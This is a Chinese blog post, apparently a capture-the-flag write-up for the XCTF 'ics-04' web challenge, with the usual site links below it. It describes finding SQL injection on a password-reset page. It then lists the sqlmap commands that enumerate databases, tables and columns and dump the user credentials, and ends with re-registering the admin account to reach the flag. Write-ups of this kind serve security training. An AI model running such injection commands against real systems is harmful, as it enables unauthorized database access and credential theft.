[wp] 攻防世界 ics-04
2020-01-12 22:16
309 查看
尝试注册登陆账号
扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump
被hash加密了,发现注册页面可以再次注册c3tlwDmIn23这个账号,成功重置密码,登入得到flag
- 点赞
- 收藏
- 分享
- 文章举报
MercyLin
发布了31 篇原创文章 · 获赞 2 · 访问量 7109
私信
关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- [wp] 攻防世界 ics-02
- [wp] 攻防世界 Web_php_include
- 攻防世界 web 进阶 ics-07
- [wp] 攻防世界 baby_web
- 攻防世界-IgniteMe WP
- 【攻防世界】CTF web04-06 一些简单的题目
- 攻防世界逆向wp
- [wp] 攻防世界 CISCN-2018-Final blgdel
- 攻防世界ics-5wp
- [wp] 攻防世界 Web_php_wrong_nginx_config
- 攻防世界NewsCenter思路
- 攻防世界 web进阶 NewsCenter
- 攻防世界pwn新手区writeup
- 第38天:攻防世界-Mobile—easy-so
- 新婚前的谋杀--解谜篇 来自推理世界A 2013/04 作者 炼弧
- tensorflow64 《深度学习原理与TensorFlow实战》04 CNN看懂世界 01 alexnet_benchmark.py
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- 【CTF】攻防世界——easy_RSA(Crypto)
- 攻防世界——pwn_forgot
- web萌新ctf练习--攻防世界--mfw